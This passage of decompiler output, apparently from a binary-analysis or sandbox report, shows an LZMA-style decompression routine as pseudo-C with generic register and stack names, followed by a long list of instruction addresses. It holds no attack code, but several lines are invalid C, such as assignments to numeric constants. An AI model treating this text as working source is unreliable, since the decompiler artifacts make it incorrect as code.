                                                          								_v20 = _v20 - __ecx;
                                                          								_v16 = _v16 - __ecx;
                                                          								__cx = __ax;
                                                          								_t222 = __edx + 1; // 0x1
                                                          								__ebx = _t222;
                                                          								__cx = __ax >> 5;
                                                          								__eflags = __eax;
                                                          								 *__esi = __ax;
                                                          							} else {
                                                          								_v20 = __ecx;
                                                          								0x800 = 0x800 - __edi;
                                                          								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          								__ebx = __ebx + __ebx;
                                                          								 *__esi = __cx;
                                                          							}
                                                          							__eflags = _v20 - 0x1000000;
                                                          							_v72 = __ebx;
                                                          							if(_v20 >= 0x1000000) {
                                                          								goto L62;
                                                          							} else {
                                                          								goto L60;
                                                          							}
                                                          						case 0x10:
                                                          							L112:
                                                          							__eflags = _v112;
                                                          							if(_v112 == 0) {
                                                          								_v140 = 0x10;
                                                          								goto L173;
                                                          							}
                                                          							__ecx = _v116;
                                                          							__eax = _v16;
                                                          							_v20 = _v20 << 8;
                                                          							__ecx =  *_v116 & 0x000000ff;
                                                          							_v112 = _v112 - 1;
                                                          							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                          							_t371 =  &_v116;
                                                          							 *_t371 = _v116 + 1;
                                                          							__eflags =  *_t371;
                                                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                          							goto L114;
                                                          						case 0x11:
                                                          							L71:
                                                          							__esi = _v92;
                                                          							_v136 = 0x12;
                                                          							goto L135;
                                                          						case 0x12:
                                                          							__eflags = _v68;
                                                          							if(_v68 != 0) {
                                                          								__eax = _v92;
                                                          								_v136 = 0x13;
                                                          								__esi = _v92 + 2;
                                                          								L135:
                                                          								_v88 = _t626;
                                                          								goto L136;
                                                          							}
                                                          							__eax = _v80;
                                                          							_v52 = _v52 & 0x00000000;
                                                          							__ecx = _v92;
                                                          							__eax = _v80 << 4;
                                                          							__eflags = __eax;
                                                          							__eax = _v92 + __eax + 4;
                                                          							goto L133;
                                                          						case 0x13:
                                                          							__eflags = _v68;
                                                          							if(_v68 != 0) {
                                                          								_t475 =  &_v92;
                                                          								 *_t475 = _v92 + 0x204;
                                                          								__eflags =  *_t475;
                                                          								_v52 = 0x10;
                                                          								_v68 = 8;
                                                          								L147:
                                                          								_v128 = 0x14;
                                                          								goto L148;
                                                          							}
                                                          							__eax = _v80;
                                                          							__ecx = _v92;
                                                          							__eax = _v80 << 4;
                                                          							_v52 = 8;
                                                          							__eax = _v92 + (_v80 << 4) + 0x104;
                                                          							L133:
                                                          							_v92 = __eax;
                                                          							_v68 = 3;
                                                          							goto L147;
                                                          						case 0x14:
                                                          							_v52 = _v52 + __ebx;
                                                          							__eax = _v132;
                                                          							goto L143;
                                                          						case 0x15:
                                                          							__eax = 0;
                                                          							__eflags = _v60 - 7;
                                                          							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                          							__al = __al & 0x000000fd;
                                                          							__eax = (__eflags >= 0) - 1 + 0xb;
                                                          							_v60 = (__eflags >= 0) - 1 + 0xb;
                                                          							goto L123;
                                                          						case 0x16:
                                                          							__eax = _v52;
                                                          							__eflags = __eax - 4;
                                                          							if(__eax >= 4) {
                                                          								_push(3);
                                                          								_pop(__eax);
                                                          							}
                                                          							__ecx = _v8;
                                                          							_v68 = 6;
                                                          							__eax = __eax << 7;
                                                          							_v128 = 0x19;
                                                          							_v92 = __eax;
                                                          							goto L148;
                                                          						case 0x17:
                                                          							L148:
                                                          							__eax = _v68;
                                                          							_v84 = 1;
                                                          							_v76 = _v68;
                                                          							goto L152;
                                                          						case 0x18:
                                                          							L149:
                                                          							__eflags = _v112;
                                                          							if(_v112 == 0) {
                                                          								_v140 = 0x18;
                                                          								goto L173;
                                                          							}
                                                          							__ecx = _v116;
                                                          							__eax = _v16;
                                                          							_v20 = _v20 << 8;
                                                          							__ecx =  *_v116 & 0x000000ff;
                                                          							_v112 = _v112 - 1;
                                                          							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                          							_t490 =  &_v116;
                                                          							 *_t490 = _v116 + 1;
                                                          							__eflags =  *_t490;
                                                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                          							L151:
                                                          							_t493 =  &_v76;
                                                          							 *_t493 = _v76 - 1;
                                                          							__eflags =  *_t493;
                                                          							L152:
                                                          							__eflags = _v76;
                                                          							if(_v76 <= 0) {
                                                          								__ecx = _v68;
                                                          								__ebx = _v84;
                                                          								0 = 1;
                                                          								__eax = 1 << __cl;
                                                          								__ebx = _v84 - (1 << __cl);
                                                          								__eax = _v128;
                                                          								_v72 = __ebx;
                                                          								L143:
                                                          								_v140 = _t561;
                                                          								goto L3;
                                                          							}
                                                          							__eax = _v84;
                                                          							_v20 = _v20 >> 0xb;
                                                          							__edx = _v84 + _v84;
                                                          							__eax = _v92;
                                                          							__esi = __edx + __eax;
                                                          							_v88 = __esi;
                                                          							__ax =  *__esi;
                                                          							__edi = __ax & 0x0000ffff;
                                                          							__ecx = (_v20 >> 0xb) * __edi;
                                                          							__eflags = _v16 - __ecx;
                                                          							if(_v16 >= __ecx) {
                                                          								_v20 = _v20 - __ecx;
                                                          								_v16 = _v16 - __ecx;
                                                          								__cx = __ax;
                                                          								__cx = __ax >> 5;
                                                          								__eax = __eax - __ecx;
                                                          								__edx = __edx + 1;
                                                          								__eflags = __edx;
                                                          								 *__esi = __ax;
                                                          								_v84 = __edx;
                                                          							} else {
                                                          								_v20 = __ecx;
                                                          								0x800 = 0x800 - __edi;
                                                          								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          								_v84 = _v84 << 1;
                                                          								 *__esi = __cx;
                                                          							}
                                                          							__eflags = _v20 - 0x1000000;
                                                          							if(_v20 >= 0x1000000) {
                                                          								goto L151;
                                                          							} else {
                                                          								goto L149;
                                                          							}
                                                          						case 0x19:
                                                          							__eflags = __ebx - 4;
                                                          							if(__ebx < 4) {
                                                          								_v48 = __ebx;
                                                          								L122:
                                                          								_t399 =  &_v48;
                                                          								 *_t399 = _v48 + 1;
                                                          								__eflags =  *_t399;
                                                          								L123:
                                                          								__eax = _v48;
                                                          								__eflags = __eax;
                                                          								if(__eax == 0) {
                                                          									_v52 = _v52 | 0xffffffff;
                                                          									goto L173;
                                                          								}
                                                          								__eflags = __eax - _v100;
                                                          								if(__eax > _v100) {
                                                          									goto L174;
                                                          								}
                                                          								_v52 = _v52 + 2;
                                                          								__eax = _v52;
                                                          								_t406 =  &_v100;
                                                          								 *_t406 = _v100 + _v52;
                                                          								__eflags =  *_t406;
                                                          								goto L126;
                                                          							}
                                                          							__ecx = __ebx;
                                                          							__eax = __ebx;
                                                          							__ecx = __ebx >> 1;
                                                          							__eax = __ebx & 0x00000001;
                                                          							__ecx = (__ebx >> 1) - 1;
                                                          							__al = __al | 0x00000002;
                                                          							__eax = (__ebx & 0x00000001) << __cl;
                                                          							__eflags = __ebx - 0xe;
                                                          							_v48 = __eax;
                                                          							if(__ebx >= 0xe) {
                                                          								__ebx = 0;
                                                          								_v76 = __ecx;
                                                          								L105:
                                                          								__eflags = _v76;
                                                          								if(_v76 <= 0) {
                                                          									__eax = __eax + __ebx;
                                                          									_v68 = 4;
                                                          									_v48 = __eax;
                                                          									__eax = _v8;
                                                          									__eax = _v8 + 0x644;
                                                          									__eflags = __eax;
                                                          									L111:
                                                          									__ebx = 0;
                                                          									_v92 = __eax;
                                                          									_v84 = 1;
                                                          									_v72 = 0;
                                                          									_v76 = 0;
                                                          									L115:
                                                          									__eax = _v68;
                                                          									__eflags = _v76 - _v68;
                                                          									if(_v76 >= _v68) {
                                                          										_t397 =  &_v48;
                                                          										 *_t397 = _v48 + __ebx;
                                                          										__eflags =  *_t397;
                                                          										goto L122;
                                                          									}
                                                          									__eax = _v84;
                                                          									_v20 = _v20 >> 0xb;
                                                          									__edi = _v84 + _v84;
                                                          									__eax = _v92;
                                                          									__esi = __edi + __eax;
                                                          									_v88 = __esi;
                                                          									__ax =  *__esi;
                                                          									__ecx = __ax & 0x0000ffff;
                                                          									__edx = (_v20 >> 0xb) * __ecx;
                                                          									__eflags = _v16 - __edx;
                                                          									if(_v16 >= __edx) {
                                                          										__ecx = 0;
                                                          										_v20 = _v20 - __edx;
                                                          										__ecx = 1;
                                                          										_v16 = _v16 - __edx;
                                                          										__ebx = 1;
                                                          										__ecx = _v76;
                                                          										__ebx = 1 << __cl;
                                                          										__ecx = 1 << __cl;
                                                          										__ebx = _v72;
                                                          										__ebx = _v72 | __ecx;
                                                          										__cx = __ax;
                                                          										__cx = __ax >> 5;
                                                          										__eax = __eax - __ecx;
                                                          										__edi = __edi + 1;
                                                          										__eflags = __edi;
                                                          										_v72 = __ebx;
                                                          										 *__esi = __ax;
                                                          										_v84 = __edi;
                                                          									} else {
                                                          										_v20 = __edx;
                                                          										0x800 = 0x800 - __ecx;
                                                          										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                          										_v84 = _v84 << 1;
                                                          										 *__esi = __dx;
                                                          									}
                                                          									__eflags = _v20 - 0x1000000;
                                                          									if(_v20 >= 0x1000000) {
                                                          										L114:
                                                          										_t374 =  &_v76;
                                                          										 *_t374 = _v76 + 1;
                                                          										__eflags =  *_t374;
                                                          										goto L115;
                                                          									} else {
                                                          										goto L112;
                                                          									}
                                                          								}
                                                          								__ecx = _v16;
                                                          								__ebx = __ebx + __ebx;
                                                          								_v20 = _v20 >> 1;
                                                          								__eflags = _v16 - _v20;
                                                          								_v72 = __ebx;
                                                          								if(_v16 >= _v20) {
                                                          									__ecx = _v20;
                                                          									_v16 = _v16 - _v20;
                                                          									__ebx = __ebx | 0x00000001;
                                                          									__eflags = __ebx;
                                                          									_v72 = __ebx;
                                                          								}
                                                          								__eflags = _v20 - 0x1000000;
                                                          								if(_v20 >= 0x1000000) {
                                                          									L104:
                                                          									_t344 =  &_v76;
                                                          									 *_t344 = _v76 - 1;
                                                          									__eflags =  *_t344;
                                                          									goto L105;
                                                          								} else {
                                                          									goto L102;
                                                          								}
                                                          							}
                                                          							__edx = _v8;
                                                          							__eax = __eax - __ebx;
                                                          							_v68 = __ecx;
                                                          							__eax = _v8 + 0x55e + __eax * 2;
                                                          							goto L111;
                                                          						case 0x1a:
                                                          							L58:
                                                          							__eflags = _v104;
                                                          							if(_v104 == 0) {
                                                          								_v140 = 0x1a;
                                                          								goto L173;
                                                          							}
                                                          							__ecx = _v108;
                                                          							__al = _v96;
                                                          							__edx = _v12;
                                                          							_v100 = _v100 + 1;
                                                          							_v108 = _v108 + 1;
                                                          							_v104 = _v104 - 1;
                                                          							 *_v108 = __al;
                                                          							__ecx = _v24;
                                                          							 *(_v12 + __ecx) = __al;
                                                          							__eax = __ecx + 1;
                                                          							__edx = 0;
                                                          							_t197 = __eax % _v120;
                                                          							__eax = __eax / _v120;
                                                          							__edx = _t197;
                                                          							goto L82;
                                                          						case 0x1b:
                                                          							L78:
                                                          							__eflags = _v104;
                                                          							if(_v104 == 0) {
                                                          								_v140 = 0x1b;
                                                          								goto L173;
                                                          							}
                                                          							__eax = _v24;
                                                          							__eax = _v24 - _v48;
                                                          							__eflags = __eax - _v120;
                                                          							if(__eax >= _v120) {
                                                          								__eax = __eax + _v120;
                                                          								__eflags = __eax;
                                                          							}
                                                          							__edx = _v12;
                                                          							__cl =  *(__edx + __eax);
                                                          							__eax = _v24;
                                                          							_v96 = __cl;
                                                          							 *(__edx + __eax) = __cl;
                                                          							__eax = __eax + 1;
                                                          							__edx = 0;
                                                          							_t280 = __eax % _v120;
                                                          							__eax = __eax / _v120;
                                                          							__edx = _t280;
                                                          							__eax = _v108;
                                                          							_v100 = _v100 + 1;
                                                          							_v108 = _v108 + 1;
                                                          							_t289 =  &_v104;
                                                          							 *_t289 = _v104 - 1;
                                                          							__eflags =  *_t289;
                                                          							 *_v108 = __cl;
                                                          							L82:
                                                          							_v24 = __edx;
                                                          							goto L83;
                                                          						case 0x1c:
                                                          							while(1) {
                                                          								L126:
                                                          								__eflags = _v104;
                                                          								if(_v104 == 0) {
                                                          									break;
                                                          								}
                                                          								__eax = _v24;
                                                          								__eax = _v24 - _v48;
                                                          								__eflags = __eax - _v120;
                                                          								if(__eax >= _v120) {
                                                          									__eax = __eax + _v120;
                                                          									__eflags = __eax;
                                                          								}
                                                          								__edx = _v12;
                                                          								__cl =  *(__edx + __eax);
                                                          								__eax = _v24;
                                                          								_v96 = __cl;
                                                          								 *(__edx + __eax) = __cl;
                                                          								__eax = __eax + 1;
                                                          								__edx = 0;
                                                          								_t420 = __eax % _v120;
                                                          								__eax = __eax / _v120;
                                                          								__edx = _t420;
                                                          								__eax = _v108;
                                                          								_v108 = _v108 + 1;
                                                          								_v104 = _v104 - 1;
                                                          								_v52 = _v52 - 1;
                                                          								__eflags = _v52;
                                                          								 *_v108 = __cl;
                                                          								_v24 = _t420;
                                                          								if(_v52 > 0) {
                                                          									continue;
                                                          								} else {
                                                          									L83:
                                                          									_v140 = 2;
                                                          									goto L3;
                                                          								}
                                                          							}
                                                          							_v140 = 0x1c;
                                                          							L173:
                                                          							_push(0x22);
                                                          							_pop(_t574);
                                                          							memcpy(_v148,  &_v140, _t574 << 2);
                                                          							return 0;
                                                          					}
                                                          				}
                                                          				L174:
                                                          				_t538 = _t537 | 0xffffffff;
                                                          				return _t538;
                                                          			}










































                                                          0x00406bc0
                                                          0x00406bc7
                                                          0x00406bcd
                                                          0x00406bd3
                                                          0x00000000
                                                          0x00406bd7
                                                          0x00406be3
                                                          0x00406be3
                                                          0x00406be3
                                                          0x00406bec
                                                          0x00000000
                                                          0x00000000
                                                          0x00406bf2
                                                          0x00000000
                                                          0x00406bf9
                                                          0x00406bfd
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c06
                                                          0x00406c09
                                                          0x00406c0c
                                                          0x00406c0e
                                                          0x00406c10
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c16
                                                          0x00406c19
                                                          0x00406c1b
                                                          0x00406c1c
                                                          0x00406c1f
                                                          0x00406c21
                                                          0x00406c22
                                                          0x00406c24
                                                          0x00406c27
                                                          0x00406c2c
                                                          0x00406c31
                                                          0x00406c3a
                                                          0x00406c4d
                                                          0x00406c50
                                                          0x00406c59
                                                          0x00406c5c
                                                          0x00406c84
                                                          0x00406c84
                                                          0x00406c86
                                                          0x00406c94
                                                          0x00406c94
                                                          0x00406c98
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c88
                                                          0x00406c88
                                                          0x00406c8b
                                                          0x00406c8b
                                                          0x00406c8c
                                                          0x00406c8c
                                                          0x00000000
                                                          0x00406c88
                                                          0x00406c5e
                                                          0x00406c62
                                                          0x00406c67
                                                          0x00406c67
                                                          0x00406c70
                                                          0x00406c76
                                                          0x00406c78
                                                          0x00406c7b
                                                          0x00000000
                                                          0x00406c81
                                                          0x00406c81
                                                          0x00000000
                                                          0x00406c81
                                                          0x00000000
                                                          0x00406c9e
                                                          0x00406c9e
                                                          0x00406ca2
                                                          0x0040754e
                                                          0x00000000
                                                          0x0040754e
                                                          0x00406cab
                                                          0x00406cbb
                                                          0x00406cbe
                                                          0x00406cc1
                                                          0x00406cc1
                                                          0x00406cc1
                                                          0x00406cc4
                                                          0x00406cc4
                                                          0x00406cc8
                                                          0x00000000
                                                          0x00000000
                                                          0x00406cca
                                                          0x00406ccd
                                                          0x00406cd0
                                                          0x00406cfa
                                                          0x00406d00
                                                          0x00406d07
                                                          0x00000000
                                                          0x00406d07
                                                          0x00406cd2
                                                          0x00406cd6
                                                          0x00406cd9
                                                          0x00406cde
                                                          0x00406cde
                                                          0x00406ce9
                                                          0x00406cef
                                                          0x00406cf1
                                                          0x00406cf4
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d39
                                                          0x00406d3f
                                                          0x00406d42
                                                          0x00406d4f
                                                          0x00406d57
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d0e
                                                          0x00406d0e
                                                          0x00406d12
                                                          0x0040755d
                                                          0x00000000
                                                          0x0040755d
                                                          0x00406d1e
                                                          0x00406d29
                                                          0x00406d29
                                                          0x00406d29
                                                          0x00406d2c
                                                          0x00406d2f
                                                          0x00406d32
                                                          0x00406d35
                                                          0x00406d37
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004073ce
                                                          0x004073ce
                                                          0x004073d4
                                                          0x004073da
                                                          0x004073dd
                                                          0x004073e0
                                                          0x004073fa
                                                          0x004073fd
                                                          0x00407403
                                                          0x0040740e
                                                          0x0040740e
                                                          0x00407410
                                                          0x004073e2
                                                          0x004073e2
                                                          0x004073f1
                                                          0x004073f5
                                                          0x004073f5
                                                          0x00407413
                                                          0x0040741a
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040741c
                                                          0x0040741c
                                                          0x00407420
                                                          0x004075cf
                                                          0x00000000
                                                          0x004075cf
                                                          0x0040742c
                                                          0x00407433
                                                          0x0040743b
                                                          0x0040743b
                                                          0x0040743b
                                                          0x0040743e
                                                          0x00407441
                                                          0x00407441
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d5f
                                                          0x00406d61
                                                          0x00406d64
                                                          0x00406dd5
                                                          0x00406dd8
                                                          0x00406ddb
                                                          0x00406de2
                                                          0x00406dec
                                                          0x00000000
                                                          0x00406dec
                                                          0x00406d66
                                                          0x00406d6a
                                                          0x00406d6d
                                                          0x00406d6f
                                                          0x00406d72
                                                          0x00406d75
                                                          0x00406d77
                                                          0x00406d7a
                                                          0x00406d7c
                                                          0x00406d81
                                                          0x00406d84
                                                          0x00406d87
                                                          0x00406d8b
                                                          0x00406d92
                                                          0x00406d95
                                                          0x00406d9c
                                                          0x00406da0
                                                          0x00406da8
                                                          0x00406da8
                                                          0x00406da8
                                                          0x00406da2
                                                          0x00406da2
                                                          0x00406da2
                                                          0x00406d97
                                                          0x00406d97
                                                          0x00406d97
                                                          0x00406dac
                                                          0x00406daf
                                                          0x00406dcd
                                                          0x00406dcf
                                                          0x00000000
                                                          0x00406dcf
                                                          0x00406db1
                                                          0x00406db4
                                                          0x00406db7
                                                          0x00406dba
                                                          0x00406dbc
                                                          0x00406dbc
                                                          0x00406dbc
                                                          0x00406dbf
                                                          0x00406dc2
                                                          0x00406dc4
                                                          0x00406dc5
                                                          0x00406dc8
                                                          0x00000000
                                                          0x00000000
                                                          0x00406ffe
                                                          0x00407002
                                                          0x00407020
                                                          0x00407023
                                                          0x0040702a
                                                          0x0040702d
                                                          0x00407030
                                                          0x00407033
                                                          0x00407036
                                                          0x00407039
                                                          0x0040703b
                                                          0x00407042
                                                          0x00407043
                                                          0x00407045
                                                          0x00407048
                                                          0x0040704b
                                                          0x0040704e
                                                          0x0040704e
                                                          0x00407053
                                                          0x00000000
                                                          0x00407053
                                                          0x00407004
                                                          0x00407007
                                                          0x0040700a
                                                          0x00407014
                                                          0x00000000
                                                          0x00000000
                                                          0x00407068
                                                          0x0040706c
                                                          0x0040708f
                                                          0x00407092
                                                          0x00407095
                                                          0x0040709f
                                                          0x0040706e
                                                          0x0040706e
                                                          0x00407071
                                                          0x00407074
                                                          0x00407077
                                                          0x00407084
                                                          0x00407087
                                                          0x00407087
                                                          0x00000000
                                                          0x00000000
                                                          0x004070ab
                                                          0x004070af
                                                          0x00000000
                                                          0x00000000
                                                          0x004070b5
                                                          0x004070b9
                                                          0x00000000
                                                          0x00000000
                                                          0x004070bf
                                                          0x004070c1
                                                          0x004070c5
                                                          0x004070c5
                                                          0x004070c8
                                                          0x004070cc
                                                          0x00000000
                                                          0x00000000
                                                          0x0040711c
                                                          0x00407120
                                                          0x00407127
                                                          0x0040712a
                                                          0x0040712d
                                                          0x00407137
                                                          0x00000000
                                                          0x00407137
                                                          0x00407122
                                                          0x00000000
                                                          0x00000000
                                                          0x00407143
                                                          0x00407147
                                                          0x0040714e
                                                          0x00407151
                                                          0x00407154
                                                          0x00407149
                                                          0x00407149
                                                          0x00407149
                                                          0x00407157
                                                          0x0040715a
                                                          0x0040715d
                                                          0x0040715d
                                                          0x00407160
                                                          0x00407163
                                                          0x00407166
                                                          0x00407166
                                                          0x00407169
                                                          0x00407170
                                                          0x00407175
                                                          0x00000000
                                                          0x00000000
                                                          0x00407203
                                                          0x00407203
                                                          0x00407207
                                                          0x004075a5
                                                          0x00000000
                                                          0x004075a5
                                                          0x0040720d
                                                          0x00407210
                                                          0x00407213
                                                          0x00407217
                                                          0x0040721a
                                                          0x00407220
                                                          0x00407222
                                                          0x00407222
                                                          0x00407222
                                                          0x00407225
                                                          0x00407228
                                                          0x00000000
                                                          0x00000000
                                                          0x00406df8
                                                          0x00406df8
                                                          0x00406dfc
                                                          0x00407569
                                                          0x00000000
                                                          0x00407569
                                                          0x00406e02
                                                          0x00406e05
                                                          0x00406e08
                                                          0x00406e0c
                                                          0x00406e0f
                                                          0x00406e15
                                                          0x00406e17
                                                          0x00406e17
                                                          0x00406e17
                                                          0x00406e1a
                                                          0x00406e1d
                                                          0x00406e1d
                                                          0x00406e20
                                                          0x00406e23
                                                          0x00000000
                                                          0x00000000
                                                          0x00406e29
                                                          0x00406e2f
                                                          0x00000000
                                                          0x00000000
                                                          0x00406e35
                                                          0x00406e35
                                                          0x00406e39
                                                          0x00406e3c
                                                          0x00406e3f
                                                          0x00406e42
                                                          0x00406e45
                                                          0x00406e46
                                                          0x00406e49
                                                          0x00406e4b
                                                          0x00406e51
                                                          0x00406e54
                                                          0x00406e57
                                                          0x00406e5a
                                                          0x00406e5d
                                                          0x00406e60
                                                          0x00406e63
                                                          0x00406e7f
                                                          0x00406e82
                                                          0x00406e85
                                                          0x00406e88
                                                          0x00406e8f
                                                          0x00406e93
                                                          0x00406e95
                                                          0x00406e99
                                                          0x00406e65
                                                          0x00406e65
                                                          0x00406e69
                                                          0x00406e71
                                                          0x00406e76
                                                          0x00406e78
                                                          0x00406e7a
                                                          0x00406e7a
                                                          0x00406e9c
                                                          0x00406ea3
                                                          0x00406ea6
                                                          0x00000000
                                                          0x00406eac
                                                          0x00000000
                                                          0x00406eac
                                                          0x00000000
                                                          0x00406eb1
                                                          0x00406eb1
                                                          0x00406eb5
                                                          0x00407575
                                                          0x00000000
                                                          0x00407575
                                                          0x00406ebb
                                                          0x00406ebe
                                                          0x00406ec1
                                                          0x00406ec5
                                                          0x00406ec8
                                                          0x00406ece
                                                          0x00406ed0
                                                          0x00406ed0
                                                          0x00406ed0
                                                          0x00406ed3
                                                          0x00406ed6
                                                          0x00406ed6
                                                          0x00406ed6
                                                          0x00406edc
                                                          0x00000000
                                                          0x00000000
                                                          0x00406ede
                                                          0x00406ee1
                                                          0x00406ee4
                                                          0x00406ee7
                                                          0x00406eea
                                                          0x00406eed
                                                          0x00406ef0
                                                          0x00406ef3
                                                          0x00406ef6
                                                          0x00406ef9
                                                          0x00406efc
                                                          0x00406f14
                                                          0x00406f17
                                                          0x00406f1a
                                                          0x00406f1d
                                                          0x00406f1d
                                                          0x00406f20
                                                          0x00406f24
                                                          0x00406f26
                                                          0x00406efe
                                                          0x00406efe
                                                          0x00406f06
                                                          0x00406f0b
                                                          0x00406f0d
                                                          0x00406f0f
                                                          0x00406f0f
                                                          0x00406f29
                                                          0x00406f30
                                                          0x00406f33
                                                          0x00000000
                                                          0x00406f35
                                                          0x00000000
                                                          0x00406f35
                                                          0x00406f33
                                                          0x00406f3a
                                                          0x00406f3a
                                                          0x00406f3a
                                                          0x00406f3a
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f75
                                                          0x00406f75
                                                          0x00406f79
                                                          0x00407581
                                                          0x00000000
                                                          0x00407581
                                                          0x00406f7f
                                                          0x00406f82
                                                          0x00406f85
                                                          0x00406f89
                                                          0x00406f8c
                                                          0x00406f92
                                                          0x00406f94
                                                          0x00406f94
                                                          0x00406f94
                                                          0x00406f97
                                                          0x00406f9a
                                                          0x00406f9a
                                                          0x00406fa0
                                                          0x00406f3e
                                                          0x00406f3e
                                                          0x00406f41
                                                          0x00000000
                                                          0x00406f41
                                                          0x00406fa2
                                                          0x00406fa2
                                                          0x00406fa5
                                                          0x00406fa8
                                                          0x00406fab
                                                          0x00406fae
                                                          0x00406fb1
                                                          0x00406fb4
                                                          0x00406fb7
                                                          0x00406fba
                                                          0x00406fbd
                                                          0x00406fc0
                                                          0x00406fd8
                                                          0x00406fdb
                                                          0x00406fde
                                                          0x00406fe1
                                                          0x00406fe1
                                                          0x00406fe4
                                                          0x00406fe8
                                                          0x00406fea
                                                          0x00406fc2
                                                          0x00406fc2
                                                          0x00406fca
                                                          0x00406fcf
                                                          0x00406fd1
                                                          0x00406fd3
                                                          0x00406fd3
                                                          0x00406fed
                                                          0x00406ff4
                                                          0x00406ff7
                                                          0x00000000
                                                          0x00406ff9
                                                          0x00000000
                                                          0x00406ff9
                                                          0x00000000
                                                          0x00407286
                                                          0x00407286
                                                          0x0040728a
                                                          0x004075b1
                                                          0x00000000
                                                          0x004075b1
                                                          0x00407290
                                                          0x00407293
                                                          0x00407296
                                                          0x0040729a
                                                          0x0040729d
                                                          0x004072a3
                                                          0x004072a5
                                                          0x004072a5
                                                          0x004072a5
                                                          0x004072a8
                                                          0x00000000
                                                          0x00000000
                                                          0x00407056
                                                          0x00407056
                                                          0x00407059
                                                          0x00000000
                                                          0x00000000
                                                          0x00407395
                                                          0x00407399
                                                          0x004073bb
                                                          0x004073be
                                                          0x004073c8
                                                          0x004073cb
                                                          0x004073cb
                                                          0x00000000
                                                          0x004073cb
                                                          0x0040739b
                                                          0x0040739e
                                                          0x004073a2
                                                          0x004073a5
                                                          0x004073a5
                                                          0x004073a8
                                                          0x00000000
                                                          0x00000000
                                                          0x00407452
                                                          0x00407456
                                                          0x00407474
                                                          0x00407474
                                                          0x00407474
                                                          0x0040747b
                                                          0x00407482
                                                          0x00407489
                                                          0x00407489
                                                          0x00000000
                                                          0x00407489
                                                          0x00407458
                                                          0x0040745b
                                                          0x0040745e
                                                          0x00407461
                                                          0x00407468
                                                          0x004073ac
                                                          0x004073ac
                                                          0x004073af
                                                          0x00000000
                                                          0x00000000
                                                          0x00407543
                                                          0x00407546
                                                          0x00000000
                                                          0x00000000
                                                          0x0040717d
                                                          0x0040717f
                                                          0x00407186
                                                          0x00407187
                                                          0x00407189
                                                          0x0040718c
                                                          0x00000000
                                                          0x00000000
                                                          0x00407194
                                                          0x00407197
                                                          0x0040719a
                                                          0x0040719c
                                                          0x0040719e
                                                          0x0040719e
                                                          0x0040719f
                                                          0x004071a2
                                                          0x004071a9
                                                          0x004071ac
                                                          0x004071ba
                                                          0x00000000
                                                          0x00000000
                                                          0x00407490
                                                          0x00407490
                                                          0x00407493
                                                          0x0040749a
                                                          0x00000000
                                                          0x00000000
                                                          0x0040749f
                                                          0x0040749f
                                                          0x004074a3
                                                          0x004075db
                                                          0x00000000
                                                          0x004075db
                                                          0x004074a9
                                                          0x004074ac
                                                          0x004074af
                                                          0x004074b3
                                                          0x004074b6
                                                          0x004074bc
                                                          0x004074be
                                                          0x004074be
                                                          0x004074be
                                                          0x004074c1
                                                          0x004074c4
                                                          0x004074c4
                                                          0x004074c4
                                                          0x004074c4
                                                          0x004074c7
                                                          0x004074c7
                                                          0x004074cb
                                                          0x0040752b
                                                          0x0040752e
                                                          0x00407533
                                                          0x00407534
                                                          0x00407536
                                                          0x00407538
                                                          0x0040753b
                                                          0x00407447
                                                          0x00407447
                                                          0x00000000
                                                          0x00407447
                                                          0x004074cd
                                                          0x004074d3
                                                          0x004074d6
                                                          0x004074d9
                                                          0x004074dc
                                                          0x004074df
                                                          0x004074e2
                                                          0x004074e5
                                                          0x004074e8
                                                          0x004074eb
                                                          0x004074ee
                                                          0x00407507
                                                          0x0040750a
                                                          0x0040750d
                                                          0x00407510
                                                          0x00407514
                                                          0x00407516
                                                          0x00407516
                                                          0x00407517
                                                          0x0040751a
                                                          0x004074f0
                                                          0x004074f0
                                                          0x004074f8
                                                          0x004074fd
                                                          0x004074ff
                                                          0x00407502
                                                          0x00407502
                                                          0x0040751d
                                                          0x00407524
                                                          0x00000000
                                                          0x00407526
                                                          0x00000000
                                                          0x00407526
                                                          0x00000000
                                                          0x004071c2
                                                          0x004071c5
                                                          0x004071fb
                                                          0x0040732b
                                                          0x0040732b
                                                          0x0040732b
                                                          0x0040732b
                                                          0x0040732e
                                                          0x0040732e
                                                          0x00407331
                                                          0x00407333
                                                          0x004075bd
                                                          0x00000000
                                                          0x004075bd
                                                          0x00407339
                                                          0x0040733c
                                                          0x00000000
                                                          0x00000000
                                                          0x00407342
                                                          0x00407346
                                                          0x00407349
                                                          0x00407349
                                                          0x00407349
                                                          0x00000000
                                                          0x00407349
                                                          0x004071c7
                                                          0x004071c9
                                                          0x004071cb
                                                          0x004071cd
                                                          0x004071d0
                                                          0x004071d1
                                                          0x004071d3
                                                          0x004071d5
                                                          0x004071d8
                                                          0x004071db
                                                          0x004071f1
                                                          0x004071f6
                                                          0x0040722e
                                                          0x0040722e
                                                          0x00407232
                                                          0x0040725e
                                                          0x00407260
                                                          0x00407267
                                                          0x0040726a
                                                          0x0040726d
                                                          0x0040726d
                                                          0x00407272
                                                          0x00407272
                                                          0x00407274
                                                          0x00407277
                                                          0x0040727e
                                                          0x00407281
                                                          0x004072ae
                                                          0x004072ae
                                                          0x004072b1
                                                          0x004072b4
                                                          0x00407328
                                                          0x00407328
                                                          0x00407328
                                                          0x00000000
                                                          0x00407328
                                                          0x004072b6
                                                          0x004072bc
                                                          0x004072bf
                                                          0x004072c2
                                                          0x004072c5
